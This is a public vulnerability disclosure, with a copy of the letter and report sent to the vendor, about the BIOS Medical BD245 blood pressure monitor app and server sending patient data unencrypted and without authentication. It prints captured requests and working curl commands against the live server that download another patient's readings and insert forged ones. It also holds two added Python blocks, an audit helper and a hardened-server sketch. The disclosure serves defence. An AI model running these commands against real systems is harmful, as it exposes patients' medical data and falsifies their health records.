Summary:

The mobile software and backend servers created by BIOS Medical / Thermor Ltd for their Bluetooth-enabled Blood Pressure Monitor and Ear Thermometer suffer from serious design flaws which expose the private medical information of their customers.

Products Affected:

  • Protocol 7D MII Blood Pressure Monitor Model BD245
  • Precision Temp Instant Ear Thermometer with Bluetooth

The following report is a copy of the letter, and detailed vulnerability / POC report which was hand delivered to Mark Beaton, VP Sales & Marketing - Thermor / BIOS Medical on November 17th 2017.

Since November 17th 2017, the flaws in the mobile software / server for the Precision Temp product have been addressed; however, the vulnerabilities in the Blood Pressure Monitoring software / server still persist as of this posting.

Since Jan 18th 2018, I have made several attempts to contact Mark Beaton with regards to the remaining vulnerabilities with no response back from BIOS Medical / Thermor LLC.

Due to the lack of resolution/response from BIOS Medical on the issue, on March 27th 2018, an official complaint was filed with Health Canada on this matter. Confirmation of receipt by Health Canada was made. After 30 days and no response back from Health Canada, a follow-up contact was made. Since there still has been no response back from Health Canada and BIOS Medical, I have decided to publish this report publicly.

Letter to BIOS Medical

Gary Reed:

I am writing you today to make you aware of a serious security issue with regards to one of your products that I recently purchased. The product involved is the BIOS Medical BD245 Blood Pressure Monitor. As a result of several security flaws in your software for this device, I was able to:

1) View unencrypted traffic as it passed between my Android phone and your hosted servers, which contained private patient information such as:
  i) email and password used to register and synchronize data.
  ii) private patient information such as name, phone #, medical professionals, and medications
2) Download other patients' B.P. results
3) Insert false B.P. readings in other patients' data.

My analysis was based on the Android Software, however due to the issues being mostly protocol related, I suspect the same issues are present with your iOS versions of the software as well. 

After the analysis of the BD245 Blood Pressure Monitor Software was complete, I took a quick look at some of your other related applications such as the Precision Temperature Software, and it would appear that you have other products / software which also contain similar security vulnerabilities. 

As I am not aware of your business model, and if these products are designed and built "in-house" or are sold as a white-label product, there is a concern that other companies that sell these devices / software are also subject to these security issues and must be made aware of their existence. Outlined in the rest of this document are the details with regards to the security flaws and the steps that can be taken to confirm their viability for exploitation.  

Based on the nature of the data exposed (both personal information, and medical related data) it is important that you address the security issues ASAP. 

Darryl Burke
Burke Consulting

Copy of Vulnerability Report

Security Flaw Details:

Three separate issues have been found with the architecture / implementation of the BD245 / B.P. Toolkit software, which allow for the exposure of private patient data, as well as the unauthenticated download / insert of records for arbitrary patients on your back-end server.

Unencrypted Data

Network traffic between the BP Toolkit client running on Android and the back-end server hosted at secureserver.net is not encrypted, and can be intercepted by third parties who have access to the network (such as enterprise admins). The information which is exposed can be considered "sensitive" if the end user has decided to fill in their "profile" in the BP Toolkit software.

The following network traffic was intercepted in plain text between an Android client and the server:

Client Request

POST /kawinsemp/struts/regist/regist_login.do HTTP/1.1
Content-Length: 1018
Content-Type: multipart/form-data; boundary=oGGqltohMWs1TFKDDo-TATCw3KWXcNCwlhZfe
Host: 192.169.201.66:8680
Connection: Keep-Alive

--oGGqltohMWs1TFKDDo-TATCw3KWXcNCwlhZfe
Content-Disposition: form-data; name="param"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"appid":"1mmu9ypy","appname":"kawin","birthday":"","confirmpass":"","deviceid":"187a9302c1de","email":"privatemail@gmail.com","issync":0,"isvalidate":"Y","lastlogintime":"2017-11-25 17:14:27","mobile":"","needvalidate":"N","newpass":"","pass":"XXXXXXXXXX","patient1contact":"bwisthetwo","patient1email":"privateemail@gmail.com","patient1listmedical":"pills","patient1medicalpro":"john","patient1name":"bwistheone","patient1phone1":"4165555555","patient1phone2":"","patient1targetdia":"101","patient1targetsys":"100","patient2contact":"","patient2email":"","patient2listmedical":"","patient2medicalpro":"","patient2name":"","patient2phone1":"","patient2phone2":"","patient2targetdia":"","patient2targetsys":"","platform":"android","regtime":"2017-11-14 14:31:14","ucode":"register20171114143114790","verifycode":""}
--oGGqltohMWs1TFKDDo-TATCw3KWXcNCwlhZfe--

Server Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 26 Nov 2017 02:30:34 GMT

{"msg":"register20171114143114790","obj":"1mmu9ypy","success":true}

Analysis

Based on the visible network traffic, there are several areas of concern which can be used to further exploit the system:

1. The data is sent in plain text to the server listening on port 8680, and does not use industry standard encryption such as SSL.

2. The username and password to the patient's account are sent in cleartext, and can be intercepted and reused by others to gain full access to the patient's account and data on the back-end server.

3. A patient's private information is exposed as part of every "login" attempt, which happens every few seconds while the application is running. This continuously sends exposed data between the client and the server, increasing the likelihood of it being intercepted by an attacker.
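As an added illustration that is not part of the original report, the following Python audit helper parses one captured request of the shape shown above and lists which credential and profile fields left the phone in cleartext. The sample capture and its values are constructed placeholders; only the endpoint path, host and the field names are taken from the regist_login request above.

```python
import json
import re

# Field names from the captured regist_login request above that carry the
# account credential or patient profile data.
SENSITIVE_KEYS = {
    "email", "pass", "newpass", "confirmpass",
    "patient1name", "patient1email", "patient1phone1", "patient1phone2",
    "patient1medicalpro", "patient1listmedical",
    "patient2name", "patient2email", "patient2phone1", "patient2phone2",
    "patient2medicalpro", "patient2listmedical",
}

# Constructed sample capture shaped like the request above; all values are placeholders.
SAMPLE_CAPTURE = (
    "POST /kawinsemp/struts/regist/regist_login.do HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=XYZ\r\n"
    "Host: 192.169.201.66:8680\r\n"
    "\r\n"
    '--XYZ\r\nContent-Disposition: form-data; name="param"\r\n'
    "Content-Type: text/plain; charset=UTF-8\r\n\r\n"
    '{"appid":"1mmu9ypy","email":"user@example.com","pass":"hunter2",'
    '"patient1name":"Jane Doe","patient1phone1":"4165550000","patient2name":""}\r\n'
    "--XYZ--\r\n"
)

def extract_param_json(raw):
    """Return the JSON document carried in the multipart part named "param"."""
    m = re.search(r'name="param".*?\r\n\r\n(\{.*?\})\r\n--', raw, re.S)
    return json.loads(m.group(1)) if m else None

def audit_cleartext_request(raw):
    """Classify one captured HTTP request: which endpoint it hit and which
    sensitive, non-empty fields it exposed (empty strings are not a leak)."""
    request_line = raw.split("\r\n", 1)[0]
    method, path = request_line.split(" ")[:2]
    host = re.search(r"^Host:\s*(\S+)\r?$", raw, re.M)
    param = extract_param_json(raw) or {}
    leaked = sorted(k for k, v in param.items() if k in SENSITIVE_KEYS and v)
    return {
        "endpoint": f"{method} {path}",
        "host": host.group(1) if host else "",
        "leaked_fields": leaked,
        # a leaked account password outranks leaked profile data
        "severity": "high" if "pass" in leaked else ("medium" if leaked else "none"),
    }
```

Run over a real capture, the same helper can be pointed at each request in the stream; because the app re-sends the login every few seconds, the "pass" field will show up on every cycle.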

Unencrypted and Unauthenticated Download of Patient data

During the application configuration, the patient enters their email and password, and the software performs a basic authentication of the patient's email and password. However, all further requests for data do not use any authentication, and instead use a sequential "key" which can be guessed to obtain data for other patients on the system.

Client Request

POST /kawinsemp/struts/normal/normal_downloadRecord.do HTTP/1.1
Content-Length: 284
Content-Type: multipart/form-data; boundary=14vE_WwZnuklZQ4XXa9FlCrQjZlFY1UVZHhe4U1
Host: 192.169.201.66:8680
Connection: Keep-Alive

--14vE_WwZnuklZQ4XXa9FlCrQjZlFY1UVZHhe4U1
Content-Disposition: form-data; name="param"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"fromrec":0,"torec":20,"ucode":"register20171114143114790","userno":""}
--14vE_WwZnuklZQ4XXa9FlCrQjZlFY1UVZHhe4U1--

Server Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 26 Nov 2017 00:56:05 GMT

{"msg":"","obj":[{"dia":100,"id":98260,"issync":1,"measuretime":"2017-11-14 14:33:00","pul":85,"recordid":"recordid20171114143328","sys":135,"ucode":"register20171114143114790","userindex":"0"},{"dia":100,"id":98261,"issync":1,"measuretime":"2017-11-14 14:36:00","pul":82,"recordid":"recordid20171114143624","sys":129,"ucode":"register20171114143114790","userindex":"0"},{"dia":91,"id":98982,"issync":1,"measuretime":"2017-11-14 14:43:00","pul":76,"recordid":"recordid20171116073426","sys":137,"ucode":"register20171114143114790","userindex":"1"},{"dia":102,"id":98983,"issync":1,"measuretime":"2017-11-16 07:30:00","pul":90,"recordid":"recordid20171116073425","sys":127,"ucode":"register20171114143114790","userindex":"0"},{"dia":101,"id":98984,"issync":1,"measuretime":"2017-11-16 07:32:00","pul":81,"recordid":"recordid20171116073425","sys":127,"ucode":"register20171114143114790","userindex":"0"}],"success":true}

Analysis

Based on the visible network traffic, there are several areas of concern which can be used to exploit the system:

1. The data is sent in plain text to the server listening on port 8680, and does not use industry standard encryption such as SSL.

2. The request is not authenticated or tied to the previous account authentication; as such, guessing the "key" can provide access to other patients' data on the system.

3. The requests use a simple date-based key format to identify patients, which can be "guessed" by sequentially looping through possible keys to identify other patients and download their data.

4. While the other patient data that can be downloaded does not contain any personal identifying information, there may be other server API endpoints which may be exploited using the "key" to gain that information. (Other API endpoints can easily be determined by reverse engineering the Android client.)

Proof of concept:

The following command can be used on any Linux-based machine to demonstrate the exposure of the patient B.P. data (note: usernames and passwords are not required to obtain the data):

curl --header Accept: --header User-Agent: --header Expect: --header "Connection: Keep-Alive" --form 'param={"fromrec":0,"torec":40,"ucode":"register20171114143114790","userno":""}' http://192.169.201.66:8680/kawinsemp/struts/normal/normal_downloadRecord.do

Unencrypted and Unauthenticated Insert of Patient data

During application use, when the patient synchronizes their phone with the B.P. monitor, the data is sent in an unencrypted and unauthenticated format to the server, which can be intercepted and used to "forge" false readings in other patients' accounts.

Client Request:

POST /kawinsemp/struts/normal/normal_syncRecords.do HTTP/1.1
Content-Length: 382
Content-Type: multipart/form-data; boundary=VOYMA6DAZ9pyuG7qP3N4WGyNMzEXJQ5IuEjfbp
Host: 192.169.201.66:8680
Connection: Keep-Alive

--VOYMA6DAZ9pyuG7qP3N4WGyNMzEXJQ5IuEjfbp
Content-Disposition: form-data; name="param"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"dia":88,"id":44,"issync":1,"measuretime":"2017-11-25 21:26:00","pul":99,"recordid":"recordid20171125212945","sys":128,"ucode":"register20171114143114790","userindex":"0"}
--VOYMA6DAZ9pyuG7qP3N4WGyNMzEXJQ5IuEjfbp--

Server Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 26 Nov 2017 02:30:00 GMT

{"msg":"","success":true}

Analysis

Based on the visible network traffic, there are several areas of concern which can be used to exploit the system:

1. The data is sent in plain text to the server listening on port 8680, and does not use industry standard encryption such as SSL.

2. The request is not authenticated or tied to the previous account authentication; keys to other patients' accounts can be guessed.

3. The requests use a simple date-based key format to identify patients, which can be "guessed" by sequentially looping through possible keys to identify other patients and insert false data.
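The missing server-side check described in this section and in the download section above, as an added example that is not part of the original report or of BIOS Medical's code: a minimal Python model of the record store in which the session token, not the client-supplied ucode, decides whose records are read or written, and record identifiers are random rather than derived from the clock. The session table, token format and record values are assumptions; the field names match the captured normal_downloadRecord.do response.

```python
import secrets

# In-memory stand-in for the back-end record table. Field names follow the
# normal_downloadRecord.do response above; the rows themselves are constructed.
RECORDS = [
    {"dia": 100, "id": 98260, "sys": 135, "pul": 85, "ucode": "register20171114143114790", "userindex": "0"},
    {"dia": 91, "id": 98982, "sys": 137, "pul": 76, "ucode": "register20171114143114790", "userindex": "1"},
    {"dia": 84, "id": 99001, "sys": 122, "pul": 70, "ucode": "register20171116091500123", "userindex": "0"},
]

# Assumed server-side session table: opaque bearer token -> ucode that logged in.
SESSIONS = {}

def login(ucode):
    """After regist_login succeeds, hand the client an unguessable session token;
    the client sends that token, not its ucode, on every later request."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = ucode
    return token

def download_records_vulnerable(param):
    """Mirrors the current behaviour: whatever ucode the body names is served."""
    rows = [r for r in RECORDS if r["ucode"] == param["ucode"]]
    return rows[param["fromrec"]:param["torec"]]

def download_records_hardened(token, param):
    """Authorization comes from the session; a ucode in the body is only
    accepted when it matches the account that owns the session."""
    ucode = SESSIONS.get(token)
    if ucode is None:
        raise PermissionError("missing or invalid session token")
    if param.get("ucode") not in (None, ucode):
        raise PermissionError("ucode in request does not match the session")
    rows = [r for r in RECORDS if r["ucode"] == ucode]
    return rows[param["fromrec"]:param["torec"]]

def sync_record_hardened(token, record):
    """Insert a reading into the session owner's account only. The server, not
    the client, assigns the ucode, a random recordid and the row id."""
    ucode = SESSIONS.get(token)
    if ucode is None:
        raise PermissionError("missing or invalid session token")
    stored = {k: record[k] for k in ("dia", "sys", "pul", "measuretime", "userindex")}
    stored["ucode"] = ucode                          # client-supplied ucode is ignored
    stored["recordid"] = "rec_" + secrets.token_hex(16)  # not derived from the clock
    stored["id"] = max(r["id"] for r in RECORDS) + 1
    RECORDS.append(stored)
    return stored
```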

Proof of concept:

The following command can be used on any Linux-based machine to demonstrate the ability to insert false B.P. data (note: usernames and passwords are not required to insert the data):

Insert False Data:

curl --header Accept: --header User-Agent: --header Expect: --header "Connection: Keep-Alive" --form 'param={"dia":77,"id":47,"issync":1,"measuretime":"2017-11-25 22:23:22","pul":99,"recordid":"recordid20171125222322","sys":99,"ucode":"register20171114143114790","userindex":"0"}' http://192.169.201.66:8680/kawinsemp/struts/normal/normal_syncRecords.do

Verify Server Acceptance of False Data:

curl --header Accept: --header User-Agent: --header Expect: --header "Connection: Keep-Alive" --form 'param={"fromrec":0,"torec":60,"ucode":"register20171114143114790","userno":""}' http://192.169.201.66:8680/kawinsemp/struts/normal/normal_downloadRecord.do

Additional data in patient data inserted and confirmed:

{ "dia": 77, "id": 103012, "issync": 1, "measuretime": "2017-11-25 22:23:22", "pul": 99, "recordid": "recordid20171125222322", "sys": 99, "ucode": "register20171114143114790", "userindex": "0" }

Darryl Burke

Over 25 years of Information Technology, Security, Hardware and Software architecture leadership, focusing on complex systems integration and mission critical applications.

The great white north http://www.burke-consulting.net